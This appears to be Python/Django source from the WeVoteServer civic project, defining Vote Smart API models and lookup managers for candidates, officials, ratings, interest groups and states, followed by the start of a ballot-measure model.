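# counter_manager = VoteSmartApiCounterManager()
# counter_manager.create_counter_entry('Rating.getSigRatings', google_civic_election_id=0)
# daily_summaries = counter_manager.retrieve_daily_summaries(kind_of_action='Rating.getSigRatings')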
class VoteSmartCandidateManager(models.Model):
def __unicode__(self):
return "VoteSmartCandidateManager"
def retrieve_candidate_from_vote_smart_id(self, vote_smart_candidate_id):
return self.retrieve_vote_smart_candidate(vote_smart_candidate_id)
def retrieve_vote_smart_candidate_from_we_vote_id(self, we_vote_id):
vote_smart_candidate_id = 0
vote_smart_candidate_manager = VoteSmartCandidateManager()
return vote_smart_candidate_manager.retrieve_vote_smart_candidate(vote_smart_candidate_id, we_vote_id)
def fetch_vote_smart_candidate_id_from_we_vote_id(self, we_vote_id):
vote_smart_candidate_id = 0
vote_smart_candidate_manager = VoteSmartCandidateManager()
results = vote_smart_candidate_manager.retrieve_vote_smart_candidate(vote_smart_candidate_id, we_vote_id)
if results['success']:
return results['vote_smart_candidate_id']
return 0
#
# def retrieve_vote_smart_candidate_from_we_vote_local_id(self, local_candidate_id):
# vote_smart_candidate_id = 0
# we_vote_id = ''
# vote_smart_candidate_manager = VoteSmartCandidateManager()
# return vote_smart_candidate_manager.retrieve_vote_smart_candidate(
# vote_smart_candidate_id, we_vote_id, candidate_maplight_id)
#
# def retrieve_vote_smart_candidate_from_full_name(self, candidate_name, state_code=None):
# vote_smart_candidate_id = 0
# we_vote_id = ''
# candidate_maplight_id = ''
# vote_smart_candidate_manager = VoteSmartCandidateManager()
#
# results = vote_smart_candidate_manager.retrieve_vote_smart_candidate(
# vote_smart_candidate_id, first_name, last_name, state_code)
# return results
def retrieve_vote_smart_candidate_from_name_components(self, first_name=None, last_name=None, state_code=None):
vote_smart_candidate_id = 0
vote_smart_candidate_manager = VoteSmartCandidateManager()
results = vote_smart_candidate_manager.retrieve_vote_smart_candidate(
vote_smart_candidate_id, first_name, last_name, state_code)
return results
# NOTE: searching by all other variables seems to return a list of objects
def retrieve_vote_smart_candidate(
self, vote_smart_candidate_id=None, first_name=None, last_name=None, state_code=None):
"""
We want to return one and only one candidate
:param vote_smart_candidate_id:
:param first_name:
:param last_name:
:param state_code:
:return:
"""
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
vote_smart_candidate = VoteSmartCandidate()
try:
if positive_value_exists(vote_smart_candidate_id):
vote_smart_candidate = VoteSmartCandidate.objects.get(candidateId=vote_smart_candidate_id)
vote_smart_candidate_id = convert_to_int(vote_smart_candidate.candidateId)
status = "RETRIEVE_VOTE_SMART_CANDIDATE_FOUND_BY_ID"
elif positive_value_exists(first_name) or positive_value_exists(last_name):
candidate_queryset = VoteSmartCandidate.objects.all()
if positive_value_exists(first_name):
first_name = first_name.replace("`", "'") # Vote Smart doesn't like this kind of apostrophe: `
candidate_queryset = candidate_queryset.filter(Q(firstName__istartswith=first_name) |
Q(nickName__istartswith=first_name) |
Q(preferredName__istartswith=first_name))
if positive_value_exists(last_name):
last_name = last_name.replace("`", "'") # Vote Smart doesn't like this kind of apostrophe: `
candidate_queryset = candidate_queryset.filter(lastName__iexact=last_name)
if positive_value_exists(state_code):
candidate_queryset = candidate_queryset.filter(Q(electionStateId__iexact=state_code) |
Q(electionStateId__iexact="NA"))
vote_smart_candidate_list = list(candidate_queryset[:1])
if vote_smart_candidate_list:
vote_smart_candidate = vote_smart_candidate_list[0]
else:
vote_smart_candidate = VoteSmartCandidate()
vote_smart_candidate_id = convert_to_int(vote_smart_candidate.candidateId)
status = "RETRIEVE_VOTE_SMART_CANDIDATE_FOUND_BY_NAME"
else:
status = "RETRIEVE_VOTE_SMART_CANDIDATE_SEARCH_INDEX_MISSING"
except VoteSmartCandidate.MultipleObjectsReturned as e:
exception_multiple_object_returned = True
status = "RETRIEVE_VOTE_SMART_CANDIDATE_MULTIPLE_OBJECTS_RETURNED"
except VoteSmartCandidate.DoesNotExist:
exception_does_not_exist = True
status = "RETRIEVE_VOTE_SMART_CANDIDATE_NOT_FOUND"
results = {
'success': True if positive_value_exists(vote_smart_candidate_id) else False,
'status': status,
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'vote_smart_candidate_found': True if positive_value_exists(vote_smart_candidate_id) else False,
'vote_smart_candidate_id': vote_smart_candidate_id,
'vote_smart_candidate': vote_smart_candidate,
}
return results
def retrieve_vote_smart_candidate_bio(self, vote_smart_candidate_id):
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
vote_smart_candidate_bio = VoteSmartCandidateBio()
vote_smart_candidate_bio_found = False
try:
if positive_value_exists(vote_smart_candidate_id):
vote_smart_candidate_bio = VoteSmartCandidateBio.objects.get(candidateId=vote_smart_candidate_id)
vote_smart_candidate_id = convert_to_int(vote_smart_candidate_bio.candidateId)
vote_smart_candidate_bio_found = True
status = "RETRIEVE_VOTE_SMART_CANDIDATE_BIO_FOUND_BY_ID"
success = True
else:
status = "RETRIEVE_VOTE_SMART_CANDIDATE_BIO_ID_MISSING"
success = False
except VoteSmartCandidateBio.MultipleObjectsReturned as e:
exception_multiple_object_returned = True
status = "RETRIEVE_VOTE_SMART_CANDIDATE_BIO_MULTIPLE_OBJECTS_RETURNED"
success = False
except VoteSmartCandidateBio.DoesNotExist:
exception_does_not_exist = True
status = "RETRIEVE_VOTE_SMART_CANDIDATE_BIO_NOT_FOUND"
success = False
results = {
'success': success,
'status': status,
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'vote_smart_candidate_bio_found': vote_smart_candidate_bio_found,
'vote_smart_candidate_id': vote_smart_candidate_id,
'vote_smart_candidate_bio': vote_smart_candidate_bio,
}
return results
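# Usage sketch (illustrative; the name values are hypothetical):
# candidate_manager = VoteSmartCandidateManager()
# results = candidate_manager.retrieve_vote_smart_candidate_from_name_components(
#     first_name='Jane', last_name='Doe', state_code='CA')
# if results['vote_smart_candidate_found']:
#     vote_smart_candidate = results['vote_smart_candidate']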
class VoteSmartCandidate(models.Model):
"""http://api.votesmart.org/docs/Candidates.html
"""
candidateId = models.CharField(max_length=15, primary_key=True)
firstName = models.CharField(max_length=255)
nickName = models.CharField(max_length=255)
middleName = models.CharField(max_length=255)
preferredName = models.CharField(max_length=255)
lastName = models.CharField(max_length=255)
suffix = models.CharField(max_length=255)
title = models.CharField(max_length=255)
ballotName = models.CharField(max_length=255)
electionParties = models.CharField(max_length=255)
electionStatus = models.CharField(max_length=255)
electionStage = models.CharField(max_length=255)
electionDistrictId = models.CharField(max_length=255)
electionDistrictName = models.CharField(max_length=255)
electionOffice = models.CharField(max_length=255)
electionOfficeId = models.CharField(max_length=255)
electionStateId = models.CharField(max_length=255)
electionOfficeTypeId = models.CharField(max_length=255)
electionYear = models.CharField(max_length=255)
electionSpecial = models.CharField(max_length=255)
electionDate = models.CharField(max_length=255)
officeParties = models.CharField(max_length=255)
officeStatus = models.CharField(max_length=255)
officeDistrictId = models.CharField(max_length=255)
officeDistrictName = models.CharField(max_length=255)
officeStateId = models.CharField(max_length=255)
officeId = models.CharField(max_length=255)
officeName = models.CharField(max_length=255)
officeTypeId = models.CharField(max_length=255)
runningMateId = models.CharField(max_length=255)
runningMateName = models.CharField(max_length=255)
def vote_smart_candidate_object_filter(one_candidate):
"""
Filter down the complete dict from Vote Smart to just the fields we use locally
:param one_candidate:
:return:
"""
one_candidate_filtered = {
'candidateId': one_candidate.candidateId,
'firstName': one_candidate.firstName,
'nickName': one_candidate.nickName,
'middleName': one_candidate.middleName,
'preferredName': one_candidate.preferredName,
'lastName': one_candidate.lastName,
'suffix': one_candidate.suffix,
'title': one_candidate.title,
'ballotName': one_candidate.ballotName,
'electionParties': one_candidate.electionParties,
'electionStatus': one_candidate.electionStatus,
'electionStage': one_candidate.electionStage,
'electionDistrictId': one_candidate.electionDistrictId,
'electionDistrictName': one_candidate.electionDistrictName,
'electionOffice': one_candidate.electionOffice,
'electionOfficeId': one_candidate.electionOfficeId,
'electionStateId': one_candidate.electionStateId,
'electionOfficeTypeId': one_candidate.electionOfficeTypeId,
'electionYear': one_candidate.electionYear,
'electionSpecial': one_candidate.electionSpecial,
'electionDate': one_candidate.electionDate,
'officeParties': one_candidate.officeParties,
'officeStatus': one_candidate.officeStatus,
'officeDistrictId': one_candidate.officeDistrictId,
'officeDistrictName': one_candidate.officeDistrictName,
'officeStateId': one_candidate.officeStateId,
'officeId': one_candidate.officeId,
'officeName': one_candidate.officeName,
'officeTypeId': one_candidate.officeTypeId,
'runningMateId': one_candidate.runningMateId,
'runningMateName': one_candidate.runningMateName,
}
return one_candidate_filtered
class VoteSmartCandidateBio(models.Model):
"""
http://api.votesmart.org/docs/CandidateBio.html
"""
candidateId = models.CharField(max_length=15, primary_key=True)
crpId = models.CharField(max_length=15) # OpenSecrets ID
firstName = models.CharField(max_length=255)
nickName = models.CharField(max_length=255)
middleName = models.CharField(max_length=255)
lastName = models.CharField(max_length=255)
preferredName = models.CharField(max_length=255)
suffix = models.CharField(max_length=255)
birthDate = models.CharField(max_length=255)
birthPlace = models.CharField(max_length=255)
pronunciation = models.CharField(max_length=255)
gender = models.CharField(max_length=255)
family = models.CharField(max_length=255)
photo = models.CharField(max_length=255)
homeCity = models.CharField(max_length=255)
homeState = models.CharField(max_length=255)
religion = models.CharField(max_length=255)
# specialMsg = models.CharField(max_length=255)
# parties = models.CharField(max_length=255)
# title = models.CharField(max_length=255)
# shortTitle = models.CharField(max_length=255)
# name = models.CharField(max_length=255)
# type = models.CharField(max_length=255)
# status = models.CharField(max_length=255)
# firstElect = models.CharField(max_length=255)
# lastElect = models.CharField(max_length=255)
# nextElect = models.CharField(max_length=255)
# termStart = models.CharField(max_length=255)
# termEnd = models.CharField(max_length=255)
# district = models.CharField(max_length=255)
# districtId = models.CharField(max_length=255)
# stateId = models.CharField(max_length=255)
education = models.CharField(max_length=255)
# profession
def vote_smart_candidate_bio_object_filter(one_candidate_bio):
"""
Filter down the complete dict from Vote Smart to just the fields we use locally
:param one_candidate_bio:
:return:
"""
one_candidate_bio_filtered = {
'candidateId': one_candidate_bio.candidateId,
'crpId': one_candidate_bio.crpId, # Open Secrets ID
'firstName': one_candidate_bio.firstName,
'nickName': one_candidate_bio.nickName,
'middleName': one_candidate_bio.middleName,
'lastName': one_candidate_bio.lastName,
'suffix': one_candidate_bio.suffix,
'birthDate': one_candidate_bio.birthDate,
'birthPlace': one_candidate_bio.birthPlace,
'pronunciation': one_candidate_bio.pronunciation,
'gender': one_candidate_bio.gender,
'family': one_candidate_bio.family,
'photo': one_candidate_bio.photo,
'homeCity': one_candidate_bio.homeCity,
'homeState': one_candidate_bio.homeState,
'religion': one_candidate_bio.religion,
# 'specialMsg': one_candidate_bio.specialMsg,
# 'parties': one_candidate_bio.parties,
# 'title': one_candidate_bio.title,
# 'shortTitle': one_candidate_bio.shortTitle,
# 'name': one_candidate_bio.name,
# 'type': one_candidate_bio.type,
# 'status': one_candidate_bio.status,
# 'firstElect': one_candidate_bio.firstElect,
# 'lastElect': one_candidate_bio.lastElect,
# 'nextElect': one_candidate_bio.nextElect,
# 'termStart': one_candidate_bio.termStart,
# 'termEnd': one_candidate_bio.termEnd,
# 'district': one_candidate_bio.district,
# 'districtId': one_candidate_bio.districtId,
# 'stateId': one_candidate_bio.stateId,
}
return one_candidate_bio_filtered
class VoteSmartOfficialManager(models.Model):
def __unicode__(self):
return "VoteSmartOfficialManager"
def retrieve_official_from_vote_smart_id(self, vote_smart_candidate_id):
return self.retrieve_vote_smart_official(vote_smart_candidate_id)
def retrieve_vote_smart_official_from_we_vote_id(self, we_vote_id):
vote_smart_candidate_id = 0
vote_smart_official_manager = VoteSmartOfficialManager()
return vote_smart_official_manager.retrieve_vote_smart_official(vote_smart_candidate_id, we_vote_id)
def fetch_vote_smart_candidate_id_from_we_vote_id(self, we_vote_id):
vote_smart_candidate_id = 0
vote_smart_official_manager = VoteSmartOfficialManager()
results = vote_smart_official_manager.retrieve_vote_smart_official(vote_smart_candidate_id, we_vote_id)
if results['success']:
return results['vote_smart_candidate_id']
return 0
#
# def retrieve_vote_smart_official_from_we_vote_local_id(self, local_official_id):
# vote_smart_candidate_id = 0
# we_vote_id = ''
# vote_smart_official_manager = VoteSmartOfficialManager()
# return vote_smart_official_manager.retrieve_vote_smart_official(
# vote_smart_candidate_id, we_vote_id, official_maplight_id)
#
# def retrieve_vote_smart_official_from_full_name(self, official_name, state_code=None):
# vote_smart_candidate_id = 0
# we_vote_id = ''
# official_maplight_id = ''
# vote_smart_official_manager = VoteSmartOfficialManager()
#
# results = vote_smart_official_manager.retrieve_vote_smart_official(
# vote_smart_candidate_id, first_name, last_name, state_code)
# return results
def retrieve_vote_smart_official_from_name_components(self, first_name=None, last_name=None, state_code=None):
vote_smart_candidate_id = 0
vote_smart_official_manager = VoteSmartOfficialManager()
results = vote_smart_official_manager.retrieve_vote_smart_official(
vote_smart_candidate_id, first_name, last_name, state_code)
return results
# NOTE: searching by all other variables seems to return a list of objects
def retrieve_vote_smart_official(
self, vote_smart_candidate_id=None, first_name=None, last_name=None, state_code=None):
"""
We want to return one and only one official
:param vote_smart_candidate_id:
:param first_name:
:param last_name:
:param state_code:
:return:
"""
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
vote_smart_official = VoteSmartOfficial()
try:
if positive_value_exists(vote_smart_candidate_id):
vote_smart_official = VoteSmartOfficial.objects.get(candidateId=vote_smart_candidate_id)
vote_smart_candidate_id = convert_to_int(vote_smart_official.candidateId)
status = "RETRIEVE_VOTE_SMART_OFFICIAL_FOUND_BY_ID"
elif positive_value_exists(first_name) or positive_value_exists(last_name):
official_queryset = VoteSmartOfficial.objects.all()
if positive_value_exists(first_name):
official_queryset = official_queryset.filter(firstName__istartswith=first_name)
if positive_value_exists(last_name):
official_queryset = official_queryset.filter(lastName__iexact=last_name)
if positive_value_exists(state_code):
official_queryset = official_queryset.filter(officeStateId__iexact=state_code)
vote_smart_official_list = list(official_queryset[:1])
if vote_smart_official_list:
vote_smart_official = vote_smart_official_list[0]
else:
vote_smart_official = VoteSmartOfficial()
vote_smart_candidate_id = convert_to_int(vote_smart_official.candidateId)
status = "RETRIEVE_VOTE_SMART_OFFICIAL_FOUND_BY_NAME"
else:
status = "RETRIEVE_VOTE_SMART_OFFICIAL_SEARCH_INDEX_MISSING"
except VoteSmartOfficial.MultipleObjectsReturned as e:
exception_multiple_object_returned = True
status = "RETRIEVE_VOTE_SMART_OFFICIAL_MULTIPLE_OBJECTS_RETURNED"
except VoteSmartOfficial.DoesNotExist:
exception_does_not_exist = True
status = "RETRIEVE_VOTE_SMART_OFFICIAL_NOT_FOUND"
results = {
'success': True if positive_value_exists(vote_smart_candidate_id) else False,
'status': status,
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'vote_smart_official_found': True if positive_value_exists(vote_smart_candidate_id) else False,
'vote_smart_candidate_id': vote_smart_candidate_id,
'vote_smart_official': vote_smart_official,
}
return results
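# Usage sketch (illustrative; the name values are hypothetical):
# official_results = VoteSmartOfficialManager().retrieve_vote_smart_official_from_name_components(
#     last_name='Doe', state_code='CA')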
class VoteSmartOfficial(models.Model):
"""
http://api.votesmart.org/docs/Officials.html
"""
candidateId = models.CharField(max_length=15, primary_key=True)
firstName = models.CharField(max_length=255)
nickName = models.CharField(max_length=255)
middleName = models.CharField(max_length=255)
lastName = models.CharField(max_length=255)
suffix = models.CharField(max_length=255)
title = models.CharField(max_length=255)
electionParties = models.CharField(max_length=255)
officeParties = models.CharField(max_length=255)
officeStatus = models.CharField(max_length=255)
officeDistrictId = models.CharField(max_length=255)
officeDistrictName = models.CharField(max_length=255)
officeTypeId = models.CharField(max_length=255)
officeId = models.CharField(max_length=255)
officeName = models.CharField(max_length=255)
officeStateId = models.CharField(max_length=255)
def vote_smart_official_object_filter(one_official):
"""
Filter down the complete dict from Vote Smart to just the fields we use locally
:param one_official:
:return:
"""
one_official_filtered = {
'candidateId': one_official.candidateId,
'firstName': one_official.firstName,
'nickName': one_official.nickName,
'middleName': one_official.middleName,
'lastName': one_official.lastName,
'suffix': one_official.suffix,
'title': one_official.title,
'electionParties': one_official.electionParties,
'officeParties': one_official.officeParties,
'officeStatus': one_official.officeStatus,
'officeDistrictId': one_official.officeDistrictId,
'officeDistrictName': one_official.officeDistrictName,
'officeTypeId': one_official.officeTypeId,
'officeId': one_official.officeId,
'officeName': one_official.officeName,
'officeStateId': one_official.officeStateId,
}
return one_official_filtered
class VoteSmartRatingManager(models.Model):
def __unicode__(self):
return "VoteSmartRatingManager"
class VoteSmartCategory(models.Model):
"""http://api.votesmart.org/docs/Rating.html
"""
categoryId = models.CharField(max_length=15, primary_key=True)
name = models.CharField(max_length=255)
def vote_smart_category_filter(category):
"""
Filter down the complete dict from Vote Smart to just the fields we use locally
:param category:
:return:
"""
category_filtered = {
'categoryId': category.categoryId,
'name': category.name,
}
return category_filtered
class VoteSmartRating(models.Model):
"""
http://api.votesmart.org/docs/Rating.html
A Vote Smart rating is like a voter guide, because it contains a package of candidateId/rating pairs like this:
    {'candidateRating': [{'candidateId': '53279', 'rating': '40'},
                         {'candidateId': '53266', 'rating': '90'},
                         ...]}
"""
ratingId = models.CharField(max_length=15, primary_key=True)
sigId = models.CharField(verbose_name="special interest group id", max_length=15)
timeSpan = models.CharField(max_length=255)
ratingName = models.CharField(max_length=255)
ratingText = models.TextField()
# This is the filter used for the Vote Smart call: Rating.getCandidateRating
# http://api.votesmart.org/docs/Rating.html
def vote_smart_candidate_rating_filter(rating):
"""
Filter down the complete dict from Vote Smart to just the fields we use locally
:param rating:
:return:
"""
rating_filtered = {
'ratingId': rating.ratingId,
'rating': rating.rating,
        'timeSpan': rating.timespan,  # Vote Smart returns this field as "timespan" (lower-case "s")
'ratingName': rating.ratingName,
'ratingText': rating.ratingText,
'sigId': rating.sigId,
}
return rating_filtered
# This is the filter used for the Vote Smart call: Rating.getSigRatings
# http://api.votesmart.org/docs/Rating.html
def vote_smart_rating_list_filter(rating):
"""
Filter down the complete dict from Vote Smart to just the fields we use locally
:param rating:
:return:
"""
rating_filtered = {
'ratingId': rating.ratingId,
        'timeSpan': rating.timespan,  # Vote Smart returns this field as "timespan" (lower-case "s")
'ratingName': rating.ratingName,
'ratingText': rating.ratingText,
}
return rating_filtered
class VoteSmartRatingOneCandidate(models.Model):
"""
http://api.votesmart.org/docs/Rating.html
A Vote Smart rating is like a voter guide, because it contains a package of candidateId/rating pairs like this:
    {'candidateRating': [{'candidateId': '53279', 'rating': '40'},
                         {'candidateId': '53266', 'rating': '90'},
                         ...]}
"""
ratingId = models.CharField(max_length=15)
sigId = models.CharField(verbose_name="special interest group id", max_length=15)
candidateId = models.CharField(max_length=15)
timeSpan = models.CharField(max_length=255)
rating = models.CharField(max_length=255)
ratingName = models.CharField(max_length=255)
ratingText = models.TextField()
def vote_smart_rating_one_candidate_filter(rating_one_candidate):
"""
Filter down the complete dict from Vote Smart to just the fields we use locally
    :param rating_one_candidate:
:return:
"""
rating_one_candidate_filtered = {
'candidateId': rating_one_candidate.candidateId,
'rating': rating_one_candidate.rating,
}
return rating_one_candidate_filtered
class VoteSmartRatingCategoryLink(models.Model):
"""http://api.votesmart.org/docs/Rating.html
"""
ratingId = models.CharField(max_length=15)
sigId = models.CharField(verbose_name="group id for this rating", max_length=15)
candidateId = models.CharField(verbose_name="vote smart candidate id for this rating", max_length=15)
timeSpan = models.CharField(max_length=255)
categoryId = models.CharField(verbose_name="category id for this rating", max_length=15)
categoryName = models.CharField(verbose_name="category name", max_length=255)
class VoteSmartSpecialInterestGroup(models.Model):
"""http://api.votesmart.org/docs/Rating.html
"""
sigId = models.CharField(verbose_name="special interest group id", max_length=15, primary_key=True)
parentId = models.CharField(max_length=15)
stateId = models.CharField(max_length=2)
name = models.CharField(verbose_name="name of special interest group", max_length=255)
description = models.TextField()
address = models.CharField(max_length=255)
city = models.CharField(max_length=255)
state = models.CharField(max_length=255)
zip = models.CharField(max_length=255)
phone1 = models.CharField(max_length=255)
phone2 = models.CharField(max_length=255)
fax = models.CharField(max_length=255)
email = models.CharField(max_length=255)
url = models.CharField(max_length=255)
contactName = models.CharField(max_length=255)
def vote_smart_special_interest_group_list_filter(special_interest_group_from_list):
"""
Filter down the complete dict from Vote Smart to just the fields we use locally
    :param special_interest_group_from_list:
:return:
"""
special_interest_group_list_filtered = {
'sigId': special_interest_group_from_list.sigId,
'parentId': special_interest_group_from_list.parentId,
'name': special_interest_group_from_list.name,
}
return special_interest_group_list_filtered
def vote_smart_special_interest_group_filter(special_interest_group):
"""
Filter down the complete dict from Vote Smart to just the fields we use locally
:param special_interest_group:
:return:
"""
special_interest_group_filtered = {
'sigId': special_interest_group.sigId,
'parentId': special_interest_group.parentId,
'stateId': special_interest_group.stateId,
'name': special_interest_group.name,
'description': special_interest_group.description,
'address': special_interest_group.address,
'city': special_interest_group.city,
'state': special_interest_group.state,
'zip': special_interest_group.zip,
'phone1': special_interest_group.phone1,
'phone2': special_interest_group.phone2,
'fax': special_interest_group.fax,
'email': special_interest_group.email,
'url': special_interest_group.url,
'contactName': special_interest_group.contactName,
}
return special_interest_group_filtered
class VoteSmartSpecialInterestGroupManager(models.Model):
def __unicode__(self):
return "VoteSmartSpecialInterestGroupManager"
def update_or_create_we_vote_organization(self, vote_smart_special_interest_group_id):
# See if we can find an existing We Vote organization with vote_smart_special_interest_group_id
if not positive_value_exists(vote_smart_special_interest_group_id):
results = {
'success': False,
'status': "SPECIAL_INTEREST_GROUP_ID_MISSING",
'organization_found': False,
'organization_created': False,
'organization': Organization(),
}
return results
# Retrieve Special Interest Group from local cache db
try:
vote_smart_organization = VoteSmartSpecialInterestGroup.objects.get(
sigId=vote_smart_special_interest_group_id)
vote_smart_organization_found = True
except VoteSmartSpecialInterestGroup.MultipleObjectsReturned as e:
vote_smart_organization = VoteSmartSpecialInterestGroup()
vote_smart_organization_found = False
except VoteSmartSpecialInterestGroup.DoesNotExist as e:
vote_smart_organization = VoteSmartSpecialInterestGroup()
# An organization matching this Vote Smart ID wasn't found
vote_smart_organization_found = False
if not vote_smart_organization_found:
results = {
'success': False,
'status': "SPECIAL_INTEREST_GROUP_MISSING",
'organization_found': False,
'organization_created': False,
'organization': Organization(),
}
return results
we_vote_organization_manager = OrganizationManager()
organization_id = 0
organization_we_vote_id = None
we_vote_organization_found = False
we_vote_organization_created = False
we_vote_organization_updated = False
results = we_vote_organization_manager.retrieve_organization(organization_id, organization_we_vote_id,
vote_smart_special_interest_group_id)
if results['organization_found']:
success = True
status = "NOT UPDATING RIGHT NOW"
we_vote_organization_found = True
we_vote_organization = results['organization']
# Update existing organization entry if email or website is missing
try:
organization_email_updated = False
organization_website_updated = False
if not positive_value_exists(we_vote_organization.organization_email) and \
positive_value_exists(vote_smart_organization.email):
we_vote_organization.organization_email = vote_smart_organization.email
organization_email_updated = True
if not positive_value_exists(we_vote_organization.organization_website) and \
positive_value_exists(vote_smart_organization.url):
we_vote_organization.organization_website = vote_smart_organization.url
organization_website_updated = True
if positive_value_exists(organization_email_updated) or \
positive_value_exists(organization_website_updated):
we_vote_organization.save()
success = True
status = "UPDATE_ORGANIZATION_FROM_VOTE_SMART_SUCCESS"
we_vote_organization_updated = True
else:
success = True
status = "UPDATE_ORGANIZATION_FROM_VOTE_SMART_NOT_REQUIRED"
we_vote_organization_updated = False
except Exception as error_instance:
error_message = error_instance.args
status = "UPDATE_ORGANIZATION_FROM_VOTE_SMART_ID_FAILED: " \
"{error_message}".format(error_message=error_message)
success = False
we_vote_organization = Organization()
else:
# Create new organization, or find existing org via other fields
try:
defaults_from_vote_smart = {
'organization_name': vote_smart_organization.name,
'organization_address': vote_smart_organization.address,
'organization_city': vote_smart_organization.city,
'organization_state': vote_smart_organization.state,
'organization_zip': vote_smart_organization.zip,
'organization_phone1': vote_smart_organization.phone1,
'organization_phone2': vote_smart_organization.phone2,
'organization_fax': vote_smart_organization.fax,
'organization_email': vote_smart_organization.email,
'organization_website': vote_smart_organization.url,
'organization_contact_name': vote_smart_organization.contactName,
'organization_description': vote_smart_organization.description,
'state_served_code': vote_smart_organization.stateId,
'vote_smart_id': vote_smart_organization.sigId,
}
we_vote_organization, we_vote_organization_created = Organization.objects.update_or_create(
organization_name=vote_smart_organization.name,
# organization_website=vote_smart_organization.url,
# organization_email=vote_smart_organization.email,
defaults=defaults_from_vote_smart,
)
success = True
status = "UPDATE_OR_CREATE_ORGANIZATION_FROM_VOTE_SMART"
we_vote_organization_found = True
except Organization.MultipleObjectsReturned as e:
success = False
status = "UPDATE_OR_CREATE_ORGANIZATION_FROM_VOTE_SMART_MULTIPLE_FOUND"
we_vote_organization = Organization()
except Exception as error_instance:
error_message = error_instance.args
status = "UPDATE_OR_CREATE_ORGANIZATION_FROM_VOTE_SMART_FAILED: " \
"{error_message}".format(error_message=error_message)
success = False
we_vote_organization = Organization()
results = {
'success': success,
'status': status,
'organization_found': we_vote_organization_found,
'organization_created': we_vote_organization_created,
'organization_updated': we_vote_organization_updated,
'organization': we_vote_organization,
}
return results
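# Usage sketch (illustrative; the sigId value is hypothetical):
# group_manager = VoteSmartSpecialInterestGroupManager()
# org_results = group_manager.update_or_create_we_vote_organization('1368')
# if org_results['organization_found']:
#     we_vote_organization = org_results['organization']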
class VoteSmartState(models.Model):
"""http://api.votesmart.org/docs/State.html
"""
stateId = models.CharField(max_length=2, primary_key=True)
name = models.CharField(max_length=50)
senators = models.CharField(max_length=255) # example: 0
billUrl = models.CharField(max_length=255) # example:
usCircuit = models.CharField(max_length=255) # example: Ninth
ltGov = models.CharField(max_length=255) # example: t
rollLower = models.CharField(max_length=255) # example: Roll no.
lowerLegis = models.CharField(max_length=255) # example: Assembly
voterReg = models.CharField(max_length=255) # example: <p style="orphans: 1;"><strong><span sty
flower = models.CharField(max_length=255) # example: Golden Poppy
area = models.CharField(max_length=255) # example: 158,693 sq mi
upperLegis = models.CharField(max_length=255) # example: Legislature
termLength = models.CharField(max_length=255) # example: 0
bicameral = models.CharField(max_length=255) # example: t
capital = models.CharField(max_length=255) # example: Sacramento
voteUrl = models.CharField(max_length=255) # example:
nickName = models.CharField(max_length=255) # example: The Golden State
bird = models.CharField(max_length=255) # example: California Valley Quail
highPoint = models.CharField(max_length=255) # example: Mt. Whitney, 14,491 ft
termLimit = models.CharField(max_length=255) # example: 0
lowPoint = models.CharField(max_length=255) # example: Death Valley, 282 ft below sea level.
primaryDate = models.CharField(max_length=255) # example:
stateType = models.CharField(max_length=255) # example: State
statehood = models.CharField(max_length=255) # example: Sept. 9, 1850 (31st state)
reps = models.CharField(max_length=255) # example: 0
motto = models.CharField(max_length=255) # example: Eureka [I Have Found It]
population = models.CharField(max_length=255) # example: 36,961,664 (2009 est.)
tree = models.CharField(max_length=255) # example:
generalDate = models.CharField(max_length=255) # example:
rollUpper = models.CharField(max_length=255) # example: Roll no.
largestCity = models.CharField(max_length=255) # example:
def vote_smart_state_filter(one_state):
"""
Filter down the complete dict from Vote Smart to just the fields we use locally
:param one_state:
:return:
"""
one_state_filtered = {
'stateId': one_state['stateId'],
'name': one_state['name'],
}
return one_state_filtered
# Methods.
def get_state(state_id):
"""Retrieve State from database."""
return VoteSmartState.objects.filter(stateId=state_id)
def get_states():
""""Retrieve all State objects from database."""
return VoteSmartState.objects.all()
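# Usage sketch (illustrative):
# california_queryset = get_state('CA')  # a queryset; may be empty if 'CA' is not cached locally
# all_states = get_states()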
```
#### File: WeVoteServer/measure/models.py
```python
from django.db import models
from django.db.models import Q
from exception.models import handle_exception, handle_record_found_more_than_one_exception
from wevote_settings.models import fetch_next_we_vote_id_last_contest_measure_integer, \
fetch_next_we_vote_id_last_measure_campaign_integer, fetch_site_unique_id_prefix
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, extract_state_from_ocd_division_id, positive_value_exists
logger = wevote_functions.admin.get_logger(__name__)
# The measure that is on the ballot (equivalent to ContestOffice)
class ContestMeasure(models.Model):
# The we_vote_id identifier is unique across all We Vote sites, and allows us to share our data with other
# organizations
# It starts with "wv" then we add on a database specific identifier like "3v" (WeVoteSetting.site_unique_id_prefix)
# then the string "meas", and then a sequential integer like "123".
# We keep the last value in WeVoteSetting.we_vote_id_last_contest_measure_integer
we_vote_id = models.CharField(
verbose_name="we vote permanent id", max_length=255, default=None, null=True, blank=True, unique=True)
maplight_id = models.CharField(verbose_name="maplight unique identifier",
max_length=255, null=True, blank=True, unique=False)
vote_smart_id = models.CharField(verbose_name="votesmart unique identifier",
max_length=200, null=True, blank=True, unique=False)
# The title of the measure (e.g. 'Proposition 42').
measure_title = models.CharField(verbose_name="measure title", max_length=255, null=False, blank=False)
# The measure's title as passed over by Google Civic. We save this so we can match to this measure even
# if we edit the measure's name locally.
google_civic_measure_title = models.CharField(verbose_name="measure name exactly as received from google civic",
max_length=255, null=True, blank=True)
# A brief description of the referendum. This field is only populated for contests of type 'Referendum'.
measure_subtitle = models.TextField(verbose_name="google civic referendum subtitle",
null=True, blank=True, default="")
# The text of the measure. This field is only populated for contests of type 'Referendum'.
measure_text = models.TextField(verbose_name="measure text", null=True, blank=False)
# A link to the referendum. This field is only populated for contests of type 'Referendum'.
measure_url = models.CharField(verbose_name="measure details url", max_length=255, null=True, blank=False)
# The unique ID of the election containing this contest. (Provided by Google Civic)
google_civic_election_id = models.CharField(
verbose_name="google civic election id", max_length=255, null=True, blank=True)
google_civic_election_id_new = models.PositiveIntegerField(
verbose_name="google civic election id new", default=0, null=False, blank=False)
ocd_division_id = models.CharField(verbose_name="ocd division id", max_length=255, null=True, blank=True)
